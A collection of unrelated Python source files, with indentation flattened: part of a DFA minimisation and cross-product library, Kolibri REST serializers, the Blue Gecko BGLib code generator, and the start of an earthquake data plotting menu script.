done = False
while not done:
done = True
new_groups = []
for selectgroup in groups:
# _check for each letter if it splits the current group
for character in self.alphabet:
# print 'Testing symbol: ', c
target = defaultdict(list)
target_states = defaultdict(int)
new_g = [set(selectgroup)]
for sid in selectgroup:
# _check if all transitions using c are going in a state
# in the same group. If they are going on a different
# group then split
deststate = _delta(graph, graph[sid], character)
destgroup = _get_group_from_state(groups,
deststate.stateid)
target[destgroup].append(sid)
target_states[destgroup] = deststate.stateid
if len(target) > 1:
inv_target_states = {
v: k for k, v in target_states.iteritems()}
new_g = [set(selectedstate) for selectedstate in target.values()]
done = False
# Get all the partitions of destgroups
queue = [set([x for x in target_states.values()])]
while queue:
top = queue.pop(0)
(group1, group2) = _partition_group(bookeeping, top)
ng1 = _reverse_to_source(
target, [inv_target_states[x] for x in group1])
ng2 = _reverse_to_source(
target, [inv_target_states[x] for x in group2])
bookeeping.append((ng1, ng2))
if len(group1) > 1:
queue.append(group1)
if len(group2) > 1:
queue.append(group2)
break
new_groups += new_g
# End of iteration for the k-equivalence
# Assign new groups and check if any change occured
groups = new_groups
# Make a copy of the old states, and prepare the
# automaton to host the minimum states
oldstates = copy.deepcopy(self.states)
self.states = []
self.define()
def findpart(stateid, partitions):
"""Searches for the groupt that the state identifier
belongs to.
Args:
stateid (int): The state identifier
partitions (list): The list of the groups
Returns:
set: The group that the stateid belongs to.
"""
for group in partitions:
if stateid in group:
return frozenset(group)
return frozenset(set( ))
def add_state_if_not_exists(group, statesmap, final):
"""
Adds a new state in the final dfa. It initialy checks if
the group of states is already registered to the automaton.
If it is registered, the state identifier is returned, or
else, a new state is added.
Args:
group (frozenset): The group that the state identifier belongs
statesmap (dict): A dictionary that maintains the state
identifiers for each forzenset
final (bool): A value indicating if the current state is
final
Returns:
int: The new state identifier
"""
if group not in statesmap:
sid = self.add_state()
self[sid].final = final
statesmap[group] = sid
return statesmap[group]
statesmap = {}
self.states = []
group = findpart(0, groups)
sid = add_state_if_not_exists(frozenset(list(group)), statesmap,
oldstates[0].final)
self[sid].initial = True
for group in groups:
if len(group) == 0:
continue
sid = add_state_if_not_exists(frozenset(group), statesmap,
oldstates[list(group)[0]].final)
state = next(iter(group))
for arc in oldstates[state]:
dst_group = findpart(arc.nextstate, groups)
dst_sid = add_state_if_not_exists(
dst_group, statesmap, oldstates[arc.nextstate].final)
self.add_arc(sid, dst_sid, graph.isyms.find(arc.ilabel))
def cross_product(self, dfa_2, accept_method):
"""A generalized cross-product constructor over two DFAs.
The third argument is a binary boolean function f; a state (q1, q2) in the final
DFA accepts if f(A[q1],A[q2]), where A indicates the acceptance-value of the state.
Args:
dfa_2: The second dfa
accept_method: The boolean action
Returns:
None
"""
dfa_1states = copy.deepcopy(self.states)
dfa_2states = dfa_2.states
self.states = []
states = {}
def _create_transitions_representation(graph, state):
"""
In order to speedup the transition iteration using
the alphabet, the function creates an index
Args:
graph (DFA): The input dfa
state (DFA state): The examined state
Returns:
dict: The generated transition map
"""
return {self.isyms.find(arc.ilabel): graph[arc.nextstate] for arc in state}
def _add_state_if_nonexistent(state_a, state_b):
"""
Adds a new state in the final dfa, which is the
combination of the input states. The initial and final
flag is also placed on the new state. If the state already
exists, its identifier is being returned.
Args:
state_a: The fist state identifier
state_b: The second state identifier
Returns:
int: The new state identifier
"""
if (state_a.stateid, state_b.stateid) not in states:
states[(state_a.stateid, state_b.stateid)] \
= self.add_state()
self[states[(state_a.stateid, state_b.stateid)]].initial \
= state_a.initial and state_b.initial
self[states[(state_a.stateid, state_b.stateid)]].final \
= accept_method(state_a.final, state_b.final)
return states[(state_a.stateid, state_b.stateid)]
for state1, state2 in product(dfa_1states, dfa_2states):
sid1 = _add_state_if_nonexistent(state1, state2)
transitions_s1 = _create_transitions_representation(dfa_1states, state1)
transitions_s2 = _create_transitions_representation(dfa_2states, state2)
for char in self.alphabet:
sid2 = _add_state_if_nonexistent(
transitions_s1[char], transitions_s2[char])
self.add_arc(sid1, sid2, char)
|
|
from le_utils.constants import content_kinds
from rest_framework import serializers
from kolibri.core.content.models import ChannelMetadata
from kolibri.core.content.models import ContentNode
from kolibri.core.content.models import File
from kolibri.core.content.models import Language
from kolibri.core.fields import create_timezonestamp
class DynamicFieldsModelSerializer(serializers.ModelSerializer):
def __init__(self, *args, **kwargs):
# Instantiate the superclass normally
super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)
# enable dynamic fields specification!
if "request" in self.context and self.context["request"].GET.get(
"fields", None
):
fields = self.context["request"].GET["fields"].split(",")
# Drop any fields that are not specified in the `fields` argument.
allowed = set(fields)
existing = set(self.fields.keys())
for field_name in existing - allowed:
self.fields.pop(field_name)
class ChannelMetadataSerializer(serializers.ModelSerializer):
root = serializers.PrimaryKeyRelatedField(read_only=True)
lang_code = serializers.SerializerMethodField()
lang_name = serializers.SerializerMethodField()
available = serializers.SerializerMethodField()
num_coach_contents = serializers.IntegerField(source="root.num_coach_contents")
def get_lang_code(self, instance):
if instance.root.lang is None:
return None
return instance.root.lang.lang_code
def get_lang_name(self, instance):
if instance.root.lang is None:
return None
return instance.root.lang.lang_name
def get_available(self, instance):
return instance.root.available
class Meta:
model = ChannelMetadata
fields = (
"author",
"description",
"tagline",
"id",
"last_updated",
"lang_code",
"lang_name",
"name",
"root",
"thumbnail",
"version",
"available",
"num_coach_contents",
"public",
)
class PublicChannelSerializer(serializers.ModelSerializer):
included_languages = serializers.SerializerMethodField()
matching_tokens = serializers.SerializerMethodField("match_tokens")
language = serializers.SerializerMethodField()
icon_encoding = serializers.SerializerMethodField()
last_published = serializers.SerializerMethodField()
def get_language(self, instance):
if instance.root.lang is None:
return None
return instance.root.lang.lang_code
def get_icon_encoding(self, instance):
return instance.thumbnail
def get_included_languages(self, instance):
return list(instance.included_languages.all().values_list("id", flat=True))
def get_last_published(self, instance):
return (
None
if not instance.last_updated
else create_timezonestamp(instance.last_updated)
)
def match_tokens(self, channel):
return []
class Meta:
model = ChannelMetadata
fields = (
"id",
"name",
"language",
"included_languages",
"description",
"tagline",
"total_resource_count",
"version",
"published_size",
"last_published",
"icon_encoding",
"matching_tokens",
"public",
)
class LowerCaseField(serializers.CharField):
def to_representation(self, obj):
return super(LowerCaseField, self).to_representation(obj).lower()
class LanguageSerializer(serializers.ModelSerializer):
id = LowerCaseField(max_length=14)
lang_code = LowerCaseField(max_length=3)
lang_subcode = LowerCaseField(max_length=10)
class Meta:
model = Language
fields = ("id", "lang_code", "lang_subcode", "lang_name", "lang_direction")
class FileSerializer(serializers.ModelSerializer):
checksum = serializers.CharField(source="local_file_id")
storage_url = serializers.SerializerMethodField()
extension = serializers.SerializerMethodField()
file_size = serializers.SerializerMethodField()
lang = LanguageSerializer()
available = serializers.BooleanField(source="local_file.available")
def get_storage_url(self, target_node):
return target_node.get_storage_url()
def get_extension(self, target_node):
return target_node.get_extension()
def get_file_size(self, target_node):
return target_node.get_file_size()
class Meta:
model = File
fields = (
"storage_url",
"id",
"priority",
"available",
"file_size",
"extension",
"checksum",
"preset",
"lang",
"supplementary",
"thumbnail",
)
class ContentNodeGranularSerializer(serializers.ModelSerializer):
num_coach_contents = serializers.SerializerMethodField()
coach_content = serializers.SerializerMethodField()
total_resources = serializers.SerializerMethodField()
importable = serializers.SerializerMethodField()
new_resource = serializers.SerializerMethodField()
num_new_resources = serializers.SerializerMethodField()
updated_resource = serializers.SerializerMethodField()
is_leaf = serializers.SerializerMethodField()
class Meta:
model = ContentNode
fields = (
"id",
"available",
"coach_content",
"importable",
"is_leaf",
"kind",
"num_coach_contents",
"on_device_resources",
"title",
"total_resources",
"new_resource",
"num_new_resources",
"updated_resource",
)
@property
def channel_stats(self):
return self.context["channel_stats"]
def get_total_resources(self, instance):
# channel_stats is None for export
if self.channel_stats is None:
return instance.on_device_resources
return self.channel_stats.get(instance.id, {"total_resources": 0})[
"total_resources"
]
def get_num_coach_contents(self, instance):
# If for exporting, only show what is available on server. For importing,
# show all of the coach contents in the topic.
if self.channel_stats is None:
return instance.num_coach_contents
return self.channel_stats.get(instance.id, {"num_coach_contents": 0})[
"num_coach_contents"
]
def get_coach_content(self, instance):
# If for exporting, only show what is on server. For importing,
# show all of the coach contents in the topic.
if self.channel_stats is None:
return instance.coach_content
return self.channel_stats.get(instance.id, {"coach_content": False})[
"coach_content"
]
def get_importable(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return instance.id in self.channel_stats
def get_new_resource(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return self.channel_stats.get(instance.id, {}).get("new_resource", False)
def get_num_new_resources(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return self.channel_stats.get(instance.id, {}).get("num_new_resources", 0)
def get_updated_resource(self, instance):
# If for export, just return None
if self.channel_stats is None:
return None
return self.channel_stats.get(instance.id, {}).get("updated_resource", False)
def get_is_leaf(self, instance):
return instance.kind != content_kinds.TOPIC
|
|
# ================================================================
# Blue Gecko BLE API BGLib code generator: Python3 platform
# Jeff Rowberg <jeff@rowberg.net>
# Kris Young <kris.young@silabs.com>
# ----------------------------------------------------------------
#
# CHANGELOG:
# 2020-08-03 - Ported to Blue Gecko (Kris Young)
# 2017-06-26 - Moved to python3
# 2013-05-04 - Fixed single-item struct.unpack returns (@zwasson on Github)
# 2013-04-28 - Fixed numerous uint8array/bd_addr command arg errors
# - Added 'debug' support
# 2013-04-16 - Fixed 'bglib_on_idle' to be 'on_idle'
# 2013-04-15 - Added wifi BGAPI support in addition to BLE BGAPI
# - Fixed references to 'this' instead of 'self'
# 2013-04-11 - Initial release
#
# ================================================================
# Refer to LICENSE.md in the project repo for license details.
from xml.dom.minidom import parseString
import string
from datetime import datetime
# open, read, and close the BLEAPI XML data
print("Reading gecko.xml...")
file = open('gecko.xml', 'r')
data = file.read()
file.close()
# parse XML into a DOM structure
print("Parsing BLE API definition...")
dom = parseString(data)
# read relevant dom nodes for highlighter generation
ble_datatypes = dom.getElementsByTagName('datatype')
ble_classes = dom.getElementsByTagName('class')
#for ble_datatype in ble_datatypes:
# print(ble_datatype.toxml())
ble_command_method_definitions = []
ble_response_callback_definitions = []
ble_response_callback_parser_conditions = []
ble_event_callback_definitions = []
ble_event_callback_parser_conditions = []
ble_constant_macros = []
for ble_class in ble_classes:
class_name = ble_class.attributes['name'].value
print("Gathering command, event, and enum data from main class '" + class_name + "'...")
if len(ble_response_callback_parser_conditions) > 0:
ble_response_callback_parser_conditions.append('elif packet_class == ' + ble_class.attributes['index'].value + ':')
else:
ble_response_callback_parser_conditions.append('if packet_class == ' + ble_class.attributes['index'].value + ':')
num_responses = 0
for ble_command in ble_class.getElementsByTagName('command'):
#print(class_name + '_' + ble_command.attributes['name'].value)
ble_command_name = class_name + '_' + ble_command.attributes['name'].value
# gather parameter info, if present
ble_params = ble_command.getElementsByTagName('params');
parameters = ['self'] # python class methods require this
payload_length = 0
payload_additional = ''
payload_parameters = []
pack_pattern = '<4B'
pack_args = ['0x20', '0', ble_class.attributes['index'].value, ble_command.attributes['index'].value]
if len(ble_params) > 0:
for ble_param in ble_params[0].getElementsByTagName('param'):
parameters.append('' + ble_param.attributes['name'].value)
if ble_param.attributes['type'].value == 'uint8':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'B'
payload_length += 1
elif ble_param.attributes['type'].value == 'int8':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'b'
payload_length += 1
elif ble_param.attributes['type'].value == 'uint16':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'H'
payload_length += 2
elif ble_param.attributes['type'].value == 'int16':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'h'
payload_length += 2
elif ble_param.attributes['type'].value == 'uint32':
pack_args.append('' + ble_param.attributes['name'].value)
pack_pattern += 'I'
payload_length += 4
elif ble_param.attributes['type'].value == 'bd_addr':
pack_args.append('' + 'bytes(i for i in ' + ble_param.attributes['name'].value + ')')
pack_pattern += '6s'
payload_length += 6
elif ble_param.attributes['type'].value == 'uint8array':
pack_args.append('len(' + ble_param.attributes['name'].value + ')')
pack_args.append('' + 'bytes(i for i in ' + ble_param.attributes['name'].value + ')')
pack_pattern += 'B\' + str(len(' + ble_param.attributes['name'].value + ')) + \'s'
payload_length += 1
payload_additional += ' + len(' + ble_param.attributes['name'].value + ')'
pack_args[1] = str(payload_length)
if len(payload_additional) > 0: pack_args[1] += payload_additional
ble_command_method_definitions.append('def gecko_cmd_' + ble_command_name + '(' + ', '.join(parameters) + '):')
ble_command_method_definitions.append(' return struct.pack(\'' + pack_pattern + '\', ' + ', '.join(pack_args) + ')')
# gather return value info, if present
ble_returns = ble_command.getElementsByTagName('returns');
returns = []
if len(ble_returns) > 0:
for ble_return in ble_returns[0].getElementsByTagName('param'):
returns.append(ble_return.attributes['type'].value + ' ' + ble_return.attributes['name'].value)
ble_response_args = []
obj_args = []
unpack_pattern = '<'
unpack_args = []
payload_length = 0
additional_code = []
if len(ble_returns) > 0:
for ble_return in ble_returns[0].getElementsByTagName('param'):
if (ble_return.attributes['type'].value == 'uint8'):
unpack_pattern += 'B'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 1
elif (ble_return.attributes['type'].value == 'uint16'):
unpack_pattern += 'H'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 2
elif (ble_return.attributes['type'].value == 'uint32'):
unpack_pattern += 'I'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 4
elif (ble_return.attributes['type'].value == 'int8'):
unpack_pattern += 'b'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 1
elif (ble_return.attributes['type'].value == 'int16'):
unpack_pattern += 'h'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 2
elif (ble_return.attributes['type'].value == 'int32'):
unpack_pattern += 'i'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 4
elif (ble_return.attributes['type'].value == 'bd_addr'):
unpack_pattern += '6s'
unpack_args.append(ble_return.attributes['name'].value)
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value)
payload_length += 6
additional_code.append(ble_return.attributes['name'].value + ' = ' + ble_return.attributes['name'].value)
elif (ble_return.attributes['type'].value == 'uint8array'):
unpack_pattern += 'B'
unpack_args.append(ble_return.attributes['name'].value + '_len')
obj_args.append("'" + ble_return.attributes['name'].value + "': " + ble_return.attributes['name'].value + '_data')
payload_length += 1
additional_code.append(ble_return.attributes['name'].value + '_data = self.bgapi_rx_payload[' + str(payload_length) + ':]')
if num_responses > 0:
ble_response_callback_parser_conditions.append(' elif packet_command == %s: # gecko_rsp_%s' % (ble_command.attributes['index'].value, ble_command_name))
else:
ble_response_callback_parser_conditions.append(' if packet_command == %s: # gecko_rsp_%s' % (ble_command.attributes['index'].value, ble_command_name))
ble_response_code = []
if payload_length > 0:
if len(unpack_args) > 1:
ble_response_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])')
else:
# "struct.unpack" returns a tuple no matter what
# (thanks @zwasson: https://github.com/jrowberg/bglib/issues/5)
ble_response_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])[0]')
[ble_response_code.append(x) for x in additional_code]
ble_response_code.append('self.gecko_rsp_' + ble_command_name + '({ ' + ', '.join(obj_args) + ' })')
ble_response_callback_parser_conditions.append(' ' + '\n '.join(ble_response_code))
if ble_class.attributes['index'].value == '0' and ble_command.attributes['index'].value == '0':
ble_response_callback_parser_conditions.append(' self.busy = False')
ble_response_callback_parser_conditions.append(' self.on_idle()')
ble_response_callback_definitions.append('gecko_rsp_' + ble_command_name + ' = BGAPIEvent()')
num_responses += 1
if num_responses == 0:
ble_response_callback_parser_conditions.pop()
if len(ble_event_callback_parser_conditions) > 0:
ble_event_callback_parser_conditions.append('elif packet_class == ' + ble_class.attributes['index'].value + ':')
else:
ble_event_callback_parser_conditions.append('if packet_class == ' + ble_class.attributes['index'].value + ':')
num_events = 0
for ble_event in ble_class.getElementsByTagName('event'):
#print(class_name + '_' + ble_event.attributes['name'].value)
ble_event_name = class_name + '_' + ble_event.attributes['name'].value
# gather parameter info, if present
ble_params = ble_event.getElementsByTagName('params');
obj_args = []
unpack_pattern = '<'
unpack_args = []
payload_length = 0
additional_code = []
if len(ble_params) > 0:
for ble_param in ble_params[0].getElementsByTagName('param'):
if (ble_param.attributes['type'].value == 'uint8'):
unpack_pattern += 'B'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 1
elif (ble_param.attributes['type'].value == 'uint16'):
unpack_pattern += 'H'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 2
elif (ble_param.attributes['type'].value == 'uint32'):
unpack_pattern += 'I'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 4
elif (ble_param.attributes['type'].value == 'int8'):
unpack_pattern += 'b'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 1
elif (ble_param.attributes['type'].value == 'int16'):
unpack_pattern += 'h'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 2
elif (ble_param.attributes['type'].value == 'int32'):
unpack_pattern += 'i'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 4
elif (ble_param.attributes['type'].value == 'bd_addr'):
unpack_pattern += '6s'
unpack_args.append(ble_param.attributes['name'].value)
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value)
payload_length += 6
additional_code.append(ble_param.attributes['name'].value + ' = ' + ble_param.attributes['name'].value)
elif (ble_param.attributes['type'].value == 'uint8array'):
unpack_pattern += 'B'
unpack_args.append(ble_param.attributes['name'].value + '_len')
obj_args.append("'" + ble_param.attributes['name'].value + "': " + ble_param.attributes['name'].value + '_data')
payload_length += 1
additional_code.append(ble_param.attributes['name'].value + '_data = self.bgapi_rx_payload[' + str(payload_length) + ':]')
if num_events > 0:
ble_event_callback_parser_conditions.append(' elif packet_command == %s: # gecko_evt_%s' % (ble_event.attributes['index'].value, ble_event_name))
else:
ble_event_callback_parser_conditions.append(' if packet_command == %s: # gecko_evt_%s' % (ble_event.attributes['index'].value, ble_event_name))
ble_event_code = []
if payload_length > 0:
if len(unpack_args) > 1:
ble_event_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])')
else:
# "struct.unpack" returns a tuple no matter what
# (thanks @zwasson: https://github.com/jrowberg/bglib/issues/5)
ble_event_code.append(', '.join(unpack_args) + ' = struct.unpack(\'' + unpack_pattern + '\', self.bgapi_rx_payload[:' + str(payload_length) + '])[0]')
[ble_event_code.append(x) for x in additional_code]
ble_event_code.append('self.gecko_evt_' + ble_event_name + '({ ' + ', '.join(obj_args) + ' })')
ble_event_callback_parser_conditions.append(' ' + '\n '.join(ble_event_code))
if ble_class.attributes['index'].value == '0' and ble_event.attributes['index'].value == '0':
ble_event_callback_parser_conditions.append(' self.busy = False')
ble_event_callback_parser_conditions.append(' self.on_idle()')
ble_event_callback_definitions.append('gecko_evt_' + ble_event_name + ' = BGAPIEvent()')
num_events += 1
if num_events == 0:
ble_event_callback_parser_conditions.pop()
for ble_enum in ble_class.getElementsByTagName('enum'):
#print(class_name + '_' + ble_enum.attributes['name'].value)
enum_name = class_name + '_' + ble_enum.attributes['name'].value
ble_constant_macros.append('#define BGLIB_' + (enum_name.upper() + ' ').ljust(54) + ble_enum.attributes['value'].value)
if len(ble_constant_macros) > 0 and ble_constant_macros[len(ble_constant_macros) - 1] != '':
ble_constant_macros.append('')
# create Python library file(s)
print("Writing Python source library files...")
source = open('bglib.py', 'w')
source.write('#!/usr/bin/env python\n\
\n\
""" Blue Gecko BGAPI/BGLib implementation\n\
\n\
Changelog:\n\
2020-08-03 - Ported to Blue Gecko v2.x API (Kris Young)\n\
2017-06-26 - Moved to python3\n\
2013-05-04 - Fixed single-item struct.unpack returns (@zwasson on Github)\n\
2013-04-28 - Fixed numerous uint8array/bd_addr command arg errors\n\
- Added \'debug\' support\n\
2013-04-16 - Fixed \'bglib_on_idle\' to be \'on_idle\'\n\
2013-04-15 - Added wifi BGAPI support in addition to BLE BGAPI\n\
- Fixed references to \'this\' instead of \'self\'\n\
2013-04-11 - Initial release\n\
\n\
============================================\n\
Blue Gecko BGLib Python interface library\n\
2013-05-04 by Jeff Rowberg <jeff@rowberg.net>\n\
Updates should (hopefully) always be available at https://github.com/jrowberg/bglib\n\
\n\
============================================\n\
BGLib Python interface library code is placed under the MIT license\n\
Copyright (c) 2013 Jeff Rowberg\n\
Copyright (c) 2020 Silicon Laboratories\n\
Permission is hereby granted, free of charge, to any person obtaining a copy\n\
of this software and associated documentation files (the "Software"), to deal\n\
in the Software without restriction, including without limitation the rights\n\
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n\
copies of the Software, and to permit persons to whom the Software is\n\
furnished to do so, subject to the following conditions:\n\
\n\
The above copyright notice and this permission notice shall be included in\n\
all copies or substantial portions of the Software.\n\
\n\
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n\
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n\
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n\
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n\
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n\
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n\
THE SOFTWARE.\n\
===============================================\n'
+ 'Generated on {}'.format(datetime.now().strftime("%Y-%b-%d %H:%M:%S")) +
'\n===============================================\n\
\n\
"""\n\
\n\
__author__ = "Jeff Rowberg"\n\
__license__ = "MIT"\n\
__version__ = "2013-05-04"\n\
__email__ = "jeff@rowberg.net"\n\
\n\
import struct\n\
\n\
\n\
# thanks to Masaaki Shibata for Python event handler code\n\
# http://www.emptypage.jp/notes/pyevent.en.html\n\
\n\
class BGAPIEvent(object):\n\
\n\
def __init__(self, doc=None):\n\
self.__doc__ = doc\n\
\n\
def __get__(self, obj, objtype=None):\n\
if obj is None:\n\
return self\n\
return BGAPIEventHandler(self, obj)\n\
\n\
def __set__(self, obj, value):\n\
pass\n\
\n\
\n\
class BGAPIEventHandler(object):\n\
\n\
def __init__(self, event, obj):\n\
\n\
self.event = event\n\
self.obj = obj\n\
\n\
def _getfunctionlist(self):\n\
\n\
"""(internal use) """\n\
\n\
try:\n\
eventhandler = self.obj.__eventhandler__\n\
except AttributeError:\n\
eventhandler = self.obj.__eventhandler__ = {}\n\
return eventhandler.setdefault(self.event, [])\n\
\n\
def add(self, func):\n\
\n\
"""Add new event handler function.\n\
\n\
Event handler function must be defined like func(sender, earg).\n\
You can add handler also by using \'+=\' operator.\n\
"""\n\
\n\
self._getfunctionlist().append(func)\n\
return self\n\
\n\
def remove(self, func):\n\
\n\
"""Remove existing event handler function.\n\
\n\
You can remove handler also by using \'-=\' operator.\n\
"""\n\
\n\
self._getfunctionlist().remove(func)\n\
return self\n\
\n\
def fire(self, earg=None):\n\
\n\
"""Fire event and call all handler functions\n\
\n\
You can call EventHandler object itself like e(earg) instead of\n\
e.fire(earg).\n\
"""\n\
\n\
for func in self._getfunctionlist():\n\
func(self.obj, earg)\n\
\n\
__iadd__ = add\n\
__isub__ = remove\n\
__call__ = fire\n\
\n\
\n\
class BGLib(object):\n\
\n\
' + ('\n '.join(ble_command_method_definitions)) + '\n\n\
' + ('\n '.join(ble_response_callback_definitions)) + '\n\n\
' + ('\n '.join(ble_event_callback_definitions)) + '\n\
\n\
on_busy = BGAPIEvent()\n\
on_idle = BGAPIEvent()\n\
on_timeout = BGAPIEvent()\n\
on_before_tx_command = BGAPIEvent()\n\
on_tx_command_complete = BGAPIEvent()\n\
\n\
bgapi_rx_buffer = b""\n\
bgapi_rx_expected_length = 0\n\
busy = False\n\
debug = False\n\
\n\
def send_command(self, ser, packet):\n\
if self.debug: print(\'=>[ \' + \' \'.join([\'%02X\' % b for b in packet]) + \' ]\')\n\
self.on_before_tx_command()\n\
self.busy = True\n\
self.on_busy()\n\
ser.write(packet)\n\
self.on_tx_command_complete()\n\
\n\
def check_activity(self, ser, timeout=0):\n\
if timeout > 0:\n\
ser.timeout = timeout\n\
while 1:\n\
x = ser.read()\n\
if len(x) > 0:\n\
self.parse(x)\n\
else: # timeout\n\
self.busy = False\n\
self.on_idle()\n\
self.on_timeout()\n\
if not self.busy: # finished\n\
break\n\
else:\n\
while ser.inWaiting(): self.parse(ser.read())\n\
return self.busy\n\
\n\
def parse(self, barray):\n\
b=barray[0]\n\
if len(self.bgapi_rx_buffer) == 0 and (b == 0xa0 or b == 0x20):\n\
self.bgapi_rx_buffer+=bytes([b])\n\
elif len(self.bgapi_rx_buffer) == 1:\n\
self.bgapi_rx_buffer+=bytes([b])\n\
self.bgapi_rx_expected_length = 4 + (self.bgapi_rx_buffer[0] & 0x07) + self.bgapi_rx_buffer[1]\n\
elif len(self.bgapi_rx_buffer) > 1:\n\
self.bgapi_rx_buffer+=bytes([b])\n\
\n\
"""\n\
BGAPI packet structure (as of 2020-06-12):\n\
Byte 0:\n\
[7] - 1 bit, Message Type (MT) 0 = Command/Response, 1 = Event\n\
[6:3] - 4 bits, Technology Type (TT) 0010 - Blue Gecko\n\
[2:0] - 3 bits, Length High (LH) Payload length (high bits)\n\
Byte 1: 8 bits, Length Low (LL) Payload length (low bits)\n\
Byte 2: 8 bits, Class ID (CID) Command class ID\n\
Byte 3: 8 bits, Command ID (CMD) Command ID\n\
Bytes 4-n: 0 - 2048 Bytes, Payload (PL) Up to 2048 bytes of payload\n\
"""\n\
\n\
#print\'%02X: %d, %d\' % (b, len(self.bgapi_rx_buffer), self.bgapi_rx_expected_length)\n\
if self.bgapi_rx_expected_length > 0 and len(self.bgapi_rx_buffer) == self.bgapi_rx_expected_length:\n\
if self.debug: print(\'<=[ \' + \' \'.join([\'%02X\' % b for b in self.bgapi_rx_buffer ]) + \' ]\')\n\
packet_type, payload_length, packet_class, packet_command = self.bgapi_rx_buffer[:4]\n\
self.bgapi_rx_payload = self.bgapi_rx_buffer[4:]\n\
self.bgapi_rx_buffer = b""\n\
if packet_type & 0xa0 == 0x20:\n\
# 0x20 = Blue Gecko response packet\n\
' + ('\n '.join(ble_response_callback_parser_conditions)) + '\n\
self.busy = False\n\
self.on_idle()\n\
elif packet_type & 0xa0 == 0xa0:\n\
# 0xa0 = Blue Gecko event packet\n\
' + ('\n '.join(ble_event_callback_parser_conditions)) + '\n\
\n\
# ================================================================\n\
\n\
')
source.close()
print("Finished!\n")
print("Python Installation Instructions:")
print("====================================")
print("1. Add bglib.py to your project")
print("2. Import bglib.* in your source file(s)")
print("3. Add event handlers for desired BGLib response and event packets\n")
|
|
#!/opt/local/bin python
# Python Menu Code to call the various procedures to plot EQ data and forecasts
#
# This code downloads data from various web sites and uses matplotlib to construct plots
import sys
import os
import numpy as np
from array import array
from EQUtilities import *
#.....................................
#
# Read pre-defined locations file
#
#.....................................
input_file = open("locations.txt", "r")
i=0
for line in input_file:
i += 1
input_file.close() # Put the file pointer back at top
number_locations = i
# Create arrays of length i filled with zeros
Location_file = ["" for x in range(i)]
MinLat_file = np.zeros(i)
MaxLat_file = np.zeros(i)
MinLng_file = np.zeros(i)
MaxLng_file = np.zeros(i)
input_file = open("locations.txt", "r")
i=-1
for line in input_file:
i+=1
line = line.strip()
items = line.split(',')
items_array = np.asarray(items)
Location_file[i] = items_array[0]
MinLat_file[i] = items_array[1]
MaxLat_file[i] = items_array[2]
MinLng_file[i] = items_array[3]
MaxLng_file[i] = items_array[4]
Location = Location_file[0]
SWLat = MinLat_file[0]
NELat = MaxLat_file[0]
SWLng = MinLng_file[0]
NELng = MaxLng_file[0]
Last_location = Location
input_file.close() # Put the file pointer back at top
#.....................................
MagLo = 5.0 # Initial default minimum magnitude
#.....................................
# Assume initially that the local region is a circle
completeness_mag = 2.99
Circle_Location = 'None'
Circle_Lat = 0.0
Circle_Lng = 0.0
Radius_float = 0.0
earthquake_depth = 1000.0
region_type = 'Circle'
settings_params = []
settings_params.append(region_type)
settings_params.append(completeness_mag)
settings_params.append(earthquake_depth)
settings_params.append(Circle_Location)
settings_params.append(Circle_Lat)
settings_params.append(Circle_Lng)
settings_params.append(Radius_float)
save_settings(settings_params)
settings_params = get_settings()
#.....................................
# Set the intial values of completeness_mag and Circle_Location here
# Write these to a file "current_settings.txt"
#.....................................
print ' '
print 'Downloading default data set'
